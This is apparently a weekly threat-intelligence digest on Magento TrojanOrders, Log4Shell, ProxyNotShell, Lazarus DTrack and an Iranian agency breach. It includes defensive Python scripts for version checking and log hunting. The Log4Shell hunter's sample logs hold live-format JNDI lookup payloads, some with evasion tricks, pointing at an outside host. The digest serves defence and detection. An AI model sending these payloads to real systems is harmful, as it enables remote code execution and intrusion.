Our reporting this week reaffirms cybercriminals’ tendency to capitalise on seasonal events. At least seven cybercriminal groups are responsible for a surge in TrojanOrders compromises of e-commerce websites using Magento software, with the number of compromises in November totalling more than the previous 10 months combined. TrojanOrders refers to the exploitation of the critical vulnerability, tracked as CVE-2022-24086 (CVSS: 9.8|OVSS: 71), affecting the checkout process of sites using the e-commerce software Magento. Cybercriminals exploit the vulnerability by creating an account on the target website and placing an order that contains malicious code in the template fields.

The timing is telling: the increase in compromises coincides with the guaranteed surge in online retail during the upcoming Black Friday and Cyber Monday sales. The increase can also be attributed to the sale of Proof-of-Concept exploits for CVE-2022-24086 on cybercriminal forums. We anticipate that TrojanOrders compromises will continue, as online retail activity is expected to remain high in the weeks up until Christmas.


Key Vulnerabilities

1. CVE-2022-24086
An improper input validation vulnerability (CVSS: 9.8|OVSS: 71) affecting Adobe Commerce and Magento Open Source versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier). Although security updates were released in February 2022, the vulnerability has been exploited in the wild in campaigns targeting Adobe Commerce merchants. Exploitation of this issue does not require user interaction and enables unauthenticated adversaries to execute arbitrary code and inject malware on unpatched websites.

2. CVE-2021-44228
A critical vulnerability tracked as Log4Shell (CVSS: 10|OVSS: 100) affecting the Apache Log4j Java-based logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters can execute arbitrary code on the server via a JNDI LDAP endpoint. Although a patch was released in December 2021, some organisations have been slow to apply it, which is why it has become an extremely attractive exploit for malicious actors, including threat actors from North Korea, China and, most recently, Iran.

3. CVE-2022-41082 & CVE-2022-41040
Two high-severity vulnerabilities in Microsoft Exchange Server 2013, 2016, and 2019, collectively known as ProxyNotShell. CVE-2022-41040 (CVSS: 8.8|OVSS: 92) is a server-side request forgery vulnerability, while CVE-2022-41082 (CVSS: 8.8|OVSS: 92) enables remote code execution when the adversary has access to PowerShell. In October 2022, researchers warned that the mitigations for these vulnerabilities were insufficient and could be bypassed by threat actors, which led Microsoft to release new ProxyNotShell security updates as part of its November 2022 patch release. On 17 November, Proof-of-Concept exploit code was released, confirming how attackers have been exploiting Exchange servers.
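For the Magento vulnerability in item 1 above, the affected ranges (2.4.3-p1 and earlier, 2.3.7-p2 and earlier) are easy to misjudge because Magento appends a security patch level (-pN) to its version string. The following added example, written for this digest and not taken from Adobe or any Magento tooling, parses such version strings and reports whether a given install sits inside the ranges stated above; where the version string comes from (composer metadata, admin footer) is left to the reader.

```python
import re
from typing import Optional, Tuple

# A version is compared as (major, minor, patch, security-patch-level); a plain
# "2.4.3" has level 0, so it sorts before "2.4.3-p1".
Version = Tuple[int, int, int, int]

# Last affected release on each branch, as stated in the advisory summary:
# 2.3.7-p2 and earlier, 2.4.3-p1 and earlier.
LAST_AFFECTED = {
    (2, 3): (2, 3, 7, 2),
    (2, 4): (2, 4, 3, 1),
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-p(\d+))?$")


def parse_version(text: str) -> Optional[Version]:
    """Parse 'major.minor.patch[-pN]'; return None for anything else."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        return None
    major, minor, patch, level = m.groups()
    return int(major), int(minor), int(patch), int(level or 0)


def is_affected_by_cve_2022_24086(text: str) -> Optional[bool]:
    """True if the version is inside an affected range, False if it postdates
    the fix on its branch, None if the string cannot be parsed."""
    version = parse_version(text)
    if version is None:
        return None
    branch = version[:2]
    if branch in LAST_AFFECTED:
        return version <= LAST_AFFECTED[branch]
    # Branches before 2.3 are "earlier" than 2.3.7-p2 and therefore in scope;
    # anything newer than the 2.4 branch postdates the February 2022 fixes.
    return branch < (2, 3)


if __name__ == "__main__":
    # Constructed sample inputs, one per interesting case.
    for candidate in ("2.4.3-p1", "2.4.3", "2.4.4", "2.3.7-p2", "2.3.7-p3", "2.2.11", "v2"):
        print(f"{candidate:10} affected={is_affected_by_cve_2022_24086(candidate)}")
```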

Key Intelligence Reports

1. Lazarus Group targets multiple countries with DTrack malware (OVSS 86)

The North Korean state-sponsored threat actor Lazarus Group is targeting victims across multiple regions including Europe, Asia and South America with the DTrack backdoor, a tool first discovered in 2019. The group is deploying the malware to compromise victims in numerous sectors including chemical manufacturing, governmental research centres, IT service providers, policy institutes and education.

DTrack’s features include keylogging, screen capture and gathering system information. These core features remain; the notable modifications to the malware are changes to the decryption process and to the way the payload is executed. Lazarus Group gains access to victims’ environments through the use of stolen credentials or by exploiting internet-exposed services. Once inside the network, DTrack unpacks in several stages, the first of which retrieves the payload from a file that imitates a legitimate NVIDIA executable named NvContainer.exe. The second and third stages decrypt portable executable files that have been encrypted using modified versions of the RC4, RC5 and RC6 algorithms. The final payload is a Dynamic Link Library (DLL) that is loaded using process hollowing into explorer.exe, the Windows File Explorer process. Specific libraries are loaded using API hashing rather than the obfuscated strings observed in previous campaigns.

Category | Result
Threat Subcategory | State-sponsored, North Korea
Threat Actor | Lazarus Group
Sectors | Education, Government, Manufacturing, Telecommunications
Objective | Payment card data/financial data theft
Countries & Target | Brazil, Germany, India, Italy, Mexico, North Korea, Saudi Arabia, Switzerland, Turkey, United States of America
Malware & Tools | DTrack
Infection Vectors | Credential compromise
Sources | https://securelist.com/dtrack-targeting-europe-latin-america/107798/

2. Cybercriminals increasingly compromise Magento e-commerce websites in TrojanOrders attacks (OVSS 61)

At least seven cybercriminal groups are responsible for a surge in TrojanOrders compromises of e-commerce websites using Magento software, with the number of compromises in November totalling more than the previous 10 months combined. TrojanOrders refers to the exploitation of the critical vulnerability, tracked as CVE-2022-24086 (CVSS: 9.8|OVSS: 71), affecting the checkout process of sites using the e-commerce software Magento. If exploited, unauthenticated adversaries can execute arbitrary code and inject malware on unpatched websites. Cybercriminals exploit the vulnerability by creating an account on the target website and placing an order that contains malicious code in the template fields. We have previously reported that cybercriminals are exploiting CVE-2022-24086 to install Remote Access Trojans (RATs) and steal personal information and payment card data.

Researchers have noted a significant increase in November 2022 of active scanning for the legitimate file “health_check.php”, where cybercriminals commonly hide RATs, to determine if the site has already been infected. If so, cybercriminals have been observed replacing the existing RAT with their own, indicating that some e-commerce sites are being compromised multiple times by different cybercriminal groups. We have previously reported on a cybercriminal group known as Water Labbu injecting a malicious JavaScript payload into at least 45 fraudulent cryptocurrency websites operated by other cybercriminals, further demonstrating that cybercriminals hijack other operations to reduce the time and effort required to launch a campaign.

This incident reaffirms cybercriminals’ tendency to capitalise on seasonal events, as the increase in compromises coincides with the guaranteed surge in online retail during the upcoming Black Friday and Cyber Monday sales in November. The increase can also be attributed to the sale of Proof-of-Concept exploits for CVE-2022-24086 on cybercriminal forums. We anticipate that this rate of TrojanOrders attacks will continue, as online retail activity is expected to remain high in the weeks up until Christmas.

Category | Result
Threat Subcategory | PII Theft
Sectors | Retail
Objective | Payment card data/financial data theft
Target System | E-commerce Platform
Target Software | Magento
CVE | CVE-2022-24086
Infection Vectors | Strategic web compromise
Sources | https://sansec.io/research/trojanorder-magento
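As a defender-side counterpart to the health_check.php scanning described in this report, the following added example (constructed for this digest, not code from Sansec) walks combined-format web access logs, constructed here with a trailing virtual-host field, and groups every request for health_check.php by client address, skipping the operator's own monitoring addresses because the file is legitimate and uptime checks will also hit it. The allowlisted monitor address is an assumption.

```python
import re
from collections import defaultdict

# Constructed log lines in combined format plus a trailing virtual-host field.
# 203.0.113.20 is the shop's own uptime monitor; 198.51.100.7 probes the file
# on two storefronts in between other requests.
SAMPLE_LOGS = [
    '203.0.113.20 - - [18/Nov/2022:09:00:01 +0000] "GET /health_check.php HTTP/1.1" 200 2 "-" "UptimeBot/1.0" shop-a.example',
    '198.51.100.7 - - [18/Nov/2022:09:00:05 +0000] "GET /health_check.php HTTP/1.1" 200 2 "-" "Mozilla/5.0" shop-a.example',
    '198.51.100.7 - - [18/Nov/2022:09:00:06 +0000] "GET /customer/account/create/ HTTP/1.1" 200 9100 "-" "Mozilla/5.0" shop-a.example',
    '198.51.100.7 - - [18/Nov/2022:09:00:09 +0000] "GET /health_check.php HTTP/1.1" 200 2 "-" "Mozilla/5.0" shop-b.example',
    '192.0.2.44 - - [18/Nov/2022:09:01:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0" shop-a.example',
]

# Assumed: addresses of the operator's own monitoring, baselined beforehand.
MONITOR_ALLOWLIST = {"203.0.113.20"}

_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<vhost>\S+)$'
)


def parse_line(line):
    """Return the named fields of a log line, or None if it does not match."""
    m = _LINE_RE.match(line)
    return m.groupdict() if m else None


def find_health_check_probes(lines, allowlist=MONITOR_ALLOWLIST):
    """Group health_check.php requests by client, skipping allowlisted monitors.
    Returns {ip: {"hits": n, "vhosts": [...], "statuses": [...]}}."""
    probes = defaultdict(lambda: {"hits": 0, "vhosts": set(), "statuses": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["ip"] in allowlist:
            continue
        if rec["path"].split("?", 1)[0].endswith("/health_check.php"):
            entry = probes[rec["ip"]]
            entry["hits"] += 1
            entry["vhosts"].add(rec["vhost"])
            entry["statuses"].add(rec["status"])
    return {ip: {"hits": e["hits"], "vhosts": sorted(e["vhosts"]), "statuses": sorted(e["statuses"])}
            for ip, e in probes.items()}


if __name__ == "__main__":
    for ip, info in find_health_check_probes(SAMPLE_LOGS).items():
        print(f"{ip}: {info['hits']} request(s) for health_check.php on {', '.join(info['vhosts'])}")
```

A single client touching the file on several storefronts is the pattern worth triaging first; the status codes tell you whether the file was actually present on each host.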

3. Iranian state-sponsored threat group compromises a US Federal Civilian Executive Branch agency (OVSS 61)

On 16 November 2022, the US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) released a joint advisory warning that an Iranian state-sponsored threat actor had exploited CVE-2021-44228 (CVSS: 10|OVSS: 100), the critical vulnerability tracked as Log4Shell affecting the ubiquitous Log4j Java-based logging library. CISA revealed that an unnamed Iranian nation-state unit had gained initial access to a Federal Civilian Executive Branch (FCEB) agency’s network by exploiting Log4Shell in an unpatched VMware Horizon server; the intrusion was uncovered by an investigation into suspected malicious activity observed on the network between mid-June and mid-July 2022.

After exploiting the vulnerability to gain access to the target network, the perpetrators installed the XMRig cryptocurrency miner and compromised credentials. They then moved laterally through the environment and implanted Ngrok reverse proxies to create an encrypted TCP tunnel, granting the threat actors remote access into the network and a means of maintaining persistence. Although a patch for CVE-2021-44228 was released in December 2021, some organisations have been slow to apply it, which is why it has become an extremely attractive exploit for malicious actors. We have previously reported on threat actors from North Korea and China exploiting this vulnerability, in addition to Iran. In their statement, CISA and the FBI warn that all organisations that have yet to apply the patch should assume they have been compromised and begin threat-hunting activities.

The statement did not disclose the name of the Iranian group; however, multiple Iranian nation-state units have been observed exploiting Log4Shell in the past. We have previously reported that the Iranian state-sponsored group MuddyWater (also known as MERCURY) exploited two Log4Shell vulnerabilities in August 2022 to compromise Israeli organisations, and APT35 (also known as Charming Kitten and Phosphorus) was also observed exploiting the same vulnerabilities back in 2021. Based on the tools and target in this incident, it is likely that the threat actors in this case are connected to one of these groups. This example also reaffirms the necessity of swiftly applying patches to critical vulnerabilities as they become available, as threat actors routinely scan for them in order to exploit them.
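Both the Log4Shell entry in the Key Vulnerabilities list and the report above rest on the same mechanism: any attacker-controlled string that reaches a Log4j logger can carry a JNDI lookup. The following added example (written for this digest, not from CISA or the advisory) is a threat-hunting helper for the "assume compromise and hunt" advice: it normalises the common evasions (percent-encoding, ${lower:}/${upper:} and ${x:-y} nested lookups) and then searches web access log lines for JNDI lookups. The log lines are constructed samples.

```python
import re
import urllib.parse

# Constructed access-log lines: a benign request, a plain lookup in the
# User-Agent, a nested-lookup evasion, and a percent-encoded lookup in the query.
SAMPLE_LOGS = [
    '10.0.0.5 - - [16/Nov/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [16/Nov/2022:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [16/Nov/2022:10:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7/x}"',
    '10.0.0.9 - - [16/Nov/2022:10:01:05 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%2Fy%7D HTTP/1.1" 400 0 "-" "curl/7.8"',
]

_PERCENT = re.compile(r"%[0-9a-fA-F]{2}")
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)

def _apply_case(m):
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()

def normalise(text, rounds=5):
    """Peel evasion layers until the text stops changing: percent-decode, then resolve
    ${lower:x}/${upper:x} and ${anything:-x} to the literal Log4j would substitute."""
    for _ in range(rounds):  # bounded so a pathological line cannot loop forever
        before = text
        if _PERCENT.search(text):
            text = urllib.parse.unquote(text)
        text = _CASE_LOOKUP.sub(_apply_case, text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text

def find_jndi_schemes(line):
    """Return the URI scheme of every JNDI lookup in a line (e.g. 'ldap'); [] if none."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalise(line))]

def scan(lines):
    """Return (client_ip, schemes) for each line that carries a JNDI lookup."""
    hits = []
    for line in lines:
        schemes = find_jndi_schemes(line)
        if schemes:
            hits.append((line.split(" ", 1)[0], schemes))
    return hits

if __name__ == "__main__":
    for ip, schemes in scan(SAMPLE_LOGS):
        print(f"{ip}: JNDI lookup via {', '.join(schemes)}")
```

Run it over the logs of anything Java-backed that was exposed during the mid-June to mid-July 2022 window described above, not only web servers, since the lookup fires wherever the string is logged.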


If you come across any issues or need assistance, please do not hesitate to reach out to Secrutiny. 

What is OVSS?

The Orpheus Vulnerability Severity Score (OVSS) helps companies understand the risk associated with particular vulnerabilities. Orpheus does this by adding context on the likely threat posed by, and impact of, CVEs, building upon the vulnerability information provided by the CVSS (Common Vulnerability Scoring System) score.
